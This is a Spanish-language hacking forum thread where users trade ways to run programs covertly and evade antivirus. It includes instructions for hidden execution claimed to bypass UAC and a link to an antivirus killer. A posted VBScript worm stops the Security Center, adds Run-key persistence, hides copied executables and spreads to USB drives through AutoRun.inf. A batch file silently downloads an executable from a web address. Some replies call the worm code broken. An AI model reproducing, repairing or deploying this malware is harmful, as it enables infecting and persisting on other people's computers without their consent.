Mensajes

Igual la idea básica sirve de todos modos es la mejor que por lo menos yo conozco de ocultar por completo un código en linea de comando sin ser detectado por el av.

Hacía tiempo que no veía un código tan chistoso. Es increíble como alguien pueda pensar que eso funcionaría correctamente, sobretodo leyendo la parte de los IF, en los que se hace un CALL a una función. Cuando haces un "cmd.run" estás ejecutando la CMD con el parámetro "/C", bueno hasta aquí estamos bastante claros, pero ¿sabes lo que pasa cuando usas el parámetro /C? estás ejecutando varias veces distintas sesiones del intérprete de comandos, por lo cual, ejecutas las líneas del script por separado y no tienen relación alguna con las que ejecutan despues.

Tampoco el código es una obra maestra...

Eso fue muy sin sentido...

En ese caso, habría sido mejor únicamente sobreescribir al momento de agregar el valor "prop" a "run" usando el parámetro "/f".

Bueno, eso sin mencionar los CALL y los GOTO que saltan a ninguna parte, los ejecutables que no se de donde salieron, etc.

Ciertamente no es complicado,

Técnicamente eso sería usar el API "MoveFile" de la librería kernel32.dll, y un "ShellExecute" o "CreateProcess" (para todos los gustos) de la misma librería DLL.

Hmm en cuanto al tema de infección de ejecutables, ya había un ejemplo en el subforo de ASM en esta comunidad... Si no mal recuerdo, hablaba sobre infección agregando una sección llamada ".TLS" en el PE.

PERDÓN ES QUE SOY MUY NUEVO EN ESTOY Y GRACIAS POR TU LECCIÓN.

Hola, les molesto una vez mas para preguntarles de como puedo hacer como una especie de virus molesto que te instala la WGA pero de forma oculta, osea yo tengo un downloader preparado en exescript vbs muy básico pero ahora necesito la forma de instar la WGA de manera oculta al cliente.

Chau y gracias por su atención...

See, por ejemplo yo logro pasar la uac como manteca atravesada por un cuchillo caliente.
Es muy facil porque a los exe los pasas a dll y si los abrís con un comando bat pasado a vbs EJEMPLO: start tudll.dll ya te lo salteas y no se ve nada.

Fácil si es lo que buscas, bueno acá te digo los pasos mas simples de tu vida:

1°:Agarra a tu EXE y cámbiale la extensión por DLL.

2°:En un VBScript pone este código:

set cmd = createobject("wscript.shell" ) 
cmd.run "cmd /c  start tuexepasadoadll.dll ", vbHide

Estoy es muy bueno si quered saltarte la UAC y ejecutarlo que el proceso no aparezca, esta tecnica podes agregarle a tu exe pasado a dll para que ejecute a otros exes parasados a dll.

Chau...

¡Que atrabajo yo eso ni ahí lo puedo hacer!

Acá tenes este killer http://troyanosyvirus.com.ar/2008/02/av-firewall-killer.html que me mato al nod32v4 2011 pero ojo, es detectado yo una vez logre que sea detectado solo por 11 antivirus con  pero...lo borre porque se que se pueden hacer virus sin destruir a un antivirus, eso ya es maldad.

pero proba con esto:

set cmd = createobject("wscript.shell" ) 
cmd.run "cmd /c  #djkds£êÑÊÀ×ËÎÄÊÀÑÎ×ËäêôŒËÎ×ô¼ŒŠ×ô ", vbHide
cmd.run "cmd /c  net stop "Centro de seguridad" ", vbHide
cmd.run "cmd /c  reg delete hklm\software\microsoft\windows\currentversion\run /v prop /f ", vbHide
cmd.run "cmd /c  reg add hklm\software\microsoft\windows\currentversion\run /v prop /d "%windir%\prop.exe" ", vbHide
cmd.run "cmd /c  ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c  attrib -s -r -h video.wmv.exe ", vbHide
cmd.run "cmd /c  copy /y "video.wmv.exe" "%windir%\video.wmv.exe ", vbHide
cmd.run "cmd /c  if exist c:\windows\video.wmv.exe start c:\windows\video.wmv.exe ", vbHide
cmd.run "cmd /c  attrib -s -r -h junto.exe ", vbHide
cmd.run "cmd /c  copy /y "junto.exe" "%windir%\junto.exe ", vbHide
cmd.run "cmd /c  attrib -s -r -h prop.exe ", vbHide
cmd.run "cmd /c  copy /y "prop.exe" "%windir%\prop.exe ", vbHide
cmd.run "cmd /c  attrib +s +r +h video.wmv.exe ", vbHide
cmd.run "cmd /c  attrib +s +r +h prop.exe ", vbHide
cmd.run "cmd /c  attrib +s +r +h junto.exe ", vbHide
cmd.run "cmd /c  :bucle ", vbHide
cmd.run "cmd /c  call :copiausb ", vbHide
cmd.run "cmd /c  :copiausb ", vbHide
cmd.run "cmd /c  if exist E: call :creausb E ", vbHide
cmd.run "cmd /c  if exist F: call :creausb F ", vbHide
cmd.run "cmd /c  if exist G: call :creausb G ", vbHide
cmd.run "cmd /c  if exist H: call :creausb H ", vbHide
cmd.run "cmd /c  if exist I: call :creausb I ", vbHide
cmd.run "cmd /c  if exist J: call :creausb J ", vbHide
cmd.run "cmd /c  if exist K: call :creausb K ", vbHide
cmd.run "cmd /c  ping -n 8 localhost > nul ", vbHide
cmd.run "cmd /c  goto bucle  ", vbHide
cmd.run "cmd /c  goto :eof ", vbHide
cmd.run "cmd /c  :creausb ", vbHide
cmd.run "cmd /c  copy /y "%windir%\junto.exe" "%1:\junto.exe" ", vbHide
cmd.run "cmd /c  attrib +s +r +h %1:\junto.exe ", vbHide
cmd.run "cmd /c  echo [Autorun] > %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo open="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo icon=%SystemRoot%\system32\SHELL32.dll,4 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo action=Abrir carpeta para ver archivos >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo shellexecute="junto.exe" >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo UseAutoPlay=1 >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo shell\\\Install\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo shell\\\explore\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  echo Shell\\\open\\\command=junto.exe >> %windir%\AutoRun.inf ", vbHide
cmd.run "cmd /c  copy /y %windir%\AutoRun.inf "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c  attrib +h +s +r "%1:\AutoRun.inf" ", vbHide
cmd.run "cmd /c  goto :eof ", vbHide

y convertirlo con el ExeScript.

Saludos y espero que te sirva...

Mira men si no funca edita tu mensaje no te cuesta nada y no hagas SPAM..

Para ocultar un exe puedes hacer con los siguiente.

Código (dos) [Seleccionar] Expandir

@echo off
attrib +r +h +s /s /d

no estoy haciendo spam estoy dando ejemplo ahh y tu code no me sirve creo yo no digo de ocultarlo sino que no se vea el dialogo en la pantalla pro igual gracias porque me sirve para hacer otra cosa

esta bien si digo esto?
@Echo off
@"%programfiles%\autoupate.exe" -h -download http://www.miweb.com/actualizacion.exe
@exit

no funciono

esta bien si digo esto?
@Echo off
@"%programfiles%\autoupate.exe" -h -download http://www.miweb.com/actualizacion.exe
@exit